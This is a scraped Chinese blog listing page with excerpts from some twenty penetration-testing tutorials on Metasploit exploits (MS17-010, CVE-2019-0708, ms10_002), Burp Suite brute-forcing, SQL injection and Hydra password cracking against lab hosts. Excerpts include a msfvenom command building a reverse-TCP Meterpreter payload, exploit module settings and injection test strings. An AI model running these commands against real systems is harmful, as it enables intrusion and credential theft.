- 博客(20)
- 资源 (3)
- 收藏
- 关注
RSS订阅原创 从建站到拿站 -- HTML和CSS基础
总有人会陪你在慌乱无序的生活里同步前行。。。---- 网易云热评一、简介HTML 指的是超文本标记语言,使用标记标签来描述网页,标签是由尖括号包括关键词组成,并且是成对出现。例如<html></html>二、一个完整的html网页<!DOCTYPE html><!-- 有助于浏览器中正确显示网页 --><html><!-- html页面开始标签 --><head><meta ...
2020-05-30 22:40:51
223
2
原创 Metasploit -- 内网渗透(ms10_002)
我们总以为,是生活欠我们一个满意,其实,是我们欠生活一个努力。。。。---- 网易云热评一、漏洞介绍ms10_002漏洞,它是IE浏览器漏洞,也称“极光漏洞”,可以通过该漏洞获取目标主机的控制权,。二、攻击过程(目标主机是xp系统)1、启动msf,搜索ms10_002search ms10_0022、选择模块use exploit/windows/browser/ms10_002_aurora3、设置payload,set payloadwindows/meterpre.
2020-05-28 22:37:51
1391
原创 Burpsuite系列 -- 爆破数据库名称
如果不是身上有烟,下雨天我都懒得打伞,如果不是有家人,我活着都嫌烦,如果不是有你,我都不想拥有最后的一点温柔。。。---- 网易云热评一、判断注入点1、页面正常访问的情况2、在id=1后面加上and 1=1和and1=2分别进行测试,发现and1=2返回不正常,说明该处存在注入192.168.1.129/sqli/Less-2/?id=1 and 1=2二、构造payload1、database()获取数据库名称2、substring()截取字符串,后面跟三个参.
2020-05-27 23:20:44
2065
1
原创 暴力破解 -- Windows和Linux登录密码
想谈恋爱吧,又不知道跟谁谈,喜欢吧又没多大可能在一起,不谈恋爱吧又想谈恋爱,谈恋爱吧又怕认真给错了人,打游戏吧每天气的半死不活,不打游戏吧,又无聊。。。。---- 网易云热评一、Windows登录密码破解目标主机:win7IP地址:192.168.1.1291、利用Hydra进行离线破解hydra -l administrator -P /root/Desktop/1.txt 192.168.1.129 smb-l 指定用户名-P制定爆破字典2、利用G...
2020-05-25 22:54:10
2027
原创 Burpsuite系列 -- 爆破Tomcat后台
以前挺好,想的少,睡得早,喜欢笑,也不知怎的就突然活得潦草了。。。。---- 网易云热评一、Vulhub搭建该Tomcat环境1、进入vulhub文件夹中Tomcat所在的目录2、启动该环境docker-compose up -d3、如果第一次启动,会下载很多软件,可能会慢一点,大家安心等待即可二、访问:http://192.168.1.133:8080/manager/html进入Tomcat后台三、打开Burpsuite开启代理,抓取Tomcat后...
2020-05-23 22:40:06
2273
1
原创 Burpsuite系列 -- SQLiPy插件使用
心眼这个东西,如果你想多了就是小心眼,想少了就是缺心眼,一直想呢就是死心眼,不想就是没心眼。。。。---- 网页云热评提醒:公众号有视频版一、SQLIPy插件介绍该插件可以把burp抓到的请求包直接利用sqlmap扫描,下载地址:https://github.com/portswigger/sqli-py二、安装Jython, 由于sqlmap是Python语言编写的,而burp是java编写的所以需要先下载jython-standalone-2.7.0.jar文件1、下载地..
2020-05-22 22:03:03
2078
原创 Burpsuite系列 -- Compare和Extender
村里的狗叫了,其它的也跟着叫,但他们不知道为什么叫,当浑浊成为一种常态,清白就是一种罪。。。。---- 网易云热评提醒:公众号有视频版一、Compare对比模块,可以比较两个数据包的不同之处二、Compare模块用法1、抓取正确用户名和密码的响应包和错误响应包,并发送到Comparer模块2、点击words进行比较,不同之处都会用深色背景标记出来三、Extender插件模块, 提供了支持第三方拓展插件的功能,可以编写自己的自定义插件或从插件商店中安装拓展插件。可以使.
2020-05-21 22:57:58
296
原创 Burpsuite系列 -- Intruder模块介绍
哪儿有那么多两情相悦,多少人不过是到了年纪,该成家了,所以一拍即合,和一个顺眼的人在一起了,吵架打架带孩子,一辈子就这么过了。我要的你,也只不过是偶尔出现在我的梦里。。。。---- 网易云热评提醒:下面有视频版一、简介Intruder模块用于完成对Web应用程序自动化攻击,一般流程:设置代理并开启拦截请求,将拦截到的数据包发送到Intruder模块,添加需要攻击的参数,设置参数字典,开始攻击。二、Target功能打开代理,拦截到请求包,在Raw处右击或者点击Action,发送..
2020-05-19 22:20:02
737
原创 Burpsuite系列 -- proxy模块介绍
不要熬夜,不要抽烟,不要总是一醉方休。世间那么多人,总有那么一个在担心你。。。。---- 网易云热评一、Proxy模块拦截、查看、修改所有客户端和服务端之间传输的数据二、Intercept功能1、Forward:将拦截到的包放行,继续发向服务器2、Drop:将拦截到的包丢弃,不会到达服务器3、Intercept is on/off:开启或关闭拦截功能4、Action:将拦截到的包发送到其他模块,相当于右击一下拦截到的包5、Raw:查看拦截包的数据流6、Par.
2020-05-18 23:30:58
816
原创 Burpsuite系列 -- (PC端、手机端)抓包配置
什么时候的影子最长,是早晨太阳升起时,也是每天黄昏日落时,还有我望着你背影的时候。。。。---- 网易云热评一、查看代理配置:Proxy--Options软件默认设置,一般也不用修改,除了端口占用或者抓手机包的时候需要修改一下二、设置浏览器代理,以火狐为例,菜单--选项--高级--网络--连接设置三、安装证书,否则不能抓HTTPS的数据包1、访问127.0.0.1:80802、点击CACertificate,下载证书,保存到桌面4、菜单-...
2020-05-17 23:28:58
1469
1
原创 Burpsuite系列 -- (burpsuite2020.4)简介及安装
聋子说,点的炮仗不响;瞎子说,点的灯不亮;瘸子说,炮仗挺响,灯也挺亮,就是平平淡淡的路,走起来有点摇摇晃晃。。。---- 网易云热评一、简介Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息,持久性,认证,代理,日志,警报的一个强大的可扩展的框架。二、下载与安装1、官方地址:https://portswigger.net/burp,初学者可以从网上找一下破.
2020-05-16 18:05:36
5850
原创 Metasploit -- MS17-010(永恒之蓝)漏洞利用
直到后来看到你恋爱的样子,才知道你从来没真正喜欢过我。。。。。---- 网易云热评一、漏洞简介MS17-010是一个安全类型的补丁,MS17-010更新修复了Microsoft Windows中的漏洞。如果攻击者向Microsoft服务器消息块1.0(SMB v 1)服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。2017年, The Shadow Brokers决定公开一部分有价值的工具, 其中”eternal blue”(永恒之蓝) 就是其中之一(漏洞编号ms .
2020-05-14 22:35:41
1340
原创 Metasploit -- CVE-2019-0708漏洞检测及利用
“医生,我得了严重的抑郁症,你能给我看看吗” “我们这有全市最搞笑的小丑,他应该能治好你的病” “医生,我就是那个小丑!”---- 网易云热评一、漏洞简介Windows系列服务器于2019年5月15号, 被爆出高危漏洞, 该漏洞影响范围较广, windows 2003、windows 2008、windows 2008R 2、windowsxp等系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389, RDP协议进行攻击的。CVE-2019-0708漏洞是通过检查用户的身份认证,导致.
2020-05-13 20:40:50
3176
2
原创 Metasploit -- FTP、Telnet和http服务探测
半个小时前接到了一个陌生电话,竟然是曾经暗恋的女生打过来的。原来我藏在魔方转轴处的“我喜欢你”的纸条,被她不到一岁的儿子在玩的时候摔了出来。这个魔方是我在五年前送给她的生日礼物。她在电话里哭成了泪人,最后我和她说,曾经我爱过好多人,做过无数浪漫的事,她们现在都很幸福,希望你也是。。。。。---- 网易云热评一、FTP服务探测1、搜索ftp相关模块:search ftp type:auxiliary2、选择模块:useauxiliary/scanner/ftp/ftp_version..
2020-05-12 20:18:58
519
原创 Metasploit -- 指定端口扫描主机
最单纯的喜欢就是,就算你拒绝了我,我对你也永远没有埋怨。但我不会再靠近了。如果你有求于我,我依然会鞠躬尽瘁。。。---- 网易云热评一、搜索端口相关模块:search portscan type:auxiliary二、tcp方式扫描1、选择模块:use auxiliary/scanner/portscan/tcp2、设置参数:show options3、设置扫描网段:set rhosts 192.168.1.0/244、设置指定端口:set ports 215..
2020-05-11 20:40:48
738
原创 Metasploit -- 主机探测模块
在你以为时间已经治愈一切的时候,却隔三差五、猝不及防地想到这个人,挥之不去,去了又来。。。---- 网易云热评一、查找主机探测模块searchscanner type:auxiliary二、arp协议探测1、选择模块:useauxiliary/scanner/discovery/arp_sweep2、设置参数:showoptions3、设置扫描网段:setrhosts 192.168.1.0/244、设置扫描线程:set threads 305、...
2020-05-10 21:40:38
294
原创 Metasploit -- 利用cve-2018-8120提升权限
其实我挺羡慕火车的,为什么?“他们连擦肩而过都那么久。。。。”---- 网易云热评一、生成木马目标主机:192.168.1.129(win7 x64)攻击机:192.168.1.33攻击端口:12121生成木马:msfvenom --arch x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.133 lport=12121 -f exe -o /root/win64.exe...
2020-05-09 21:21:03
750
5
原创 Metasploit -- 木马生成原理和方法
以前的人,要疯要癫要崩溃,都特别戏剧化,比如披头散发,涕泗横流,瞠目结舌等等。现在的人不会,他就静静地坐在那里,面无表情,不声不响,看着很正常,但禁不起触碰。你上前轻轻碰一下,问一句,他就垮了,就崩溃了。。。---- 网易云热评一、生成方式:利用msf模块中的msfvenom模块二、原理:msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马...
2020-05-07 21:08:53
2250
原创 Metasploit -- 各类密码破解
你说什么最难受?是相爱的人见不了面?还是最爱的人在别人身边?---- 网易云热评一、FTP服务1、文件传输协议,是用于在网络上进行文件传输的一套标准协议。破解成功之后可查看是否有文件上传权限,若有,可进一步利用,若没有,则可以获取一些敏感数据。2、默认端口:213、模块位置:auxiliary/scanner/ftp/ftp_login4、选择模块、设置目标主机、设置用...
2020-05-06 21:33:15
2204
原创 Metasploit -- 对Apache HTTP服务器守护进程中断复现
后来我发现,太浓烈的东西总是不长久,应了那句老话,第一眼就心动的人没法做朋友 。。。---- 网易云热评一、漏洞简介Apache HTTP服务器1.x和2.x允许远程攻击者通过部分HTTP请求导致拒绝服务(守护进程中断),这与2.2.15之前版本中缺少mod_ReqTimeout模块有关。二、漏洞利用1、访问我们的靶机:192.168.1.131,正常访问2、启动msf,通过nm...
2020-05-04 21:28:44
383
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人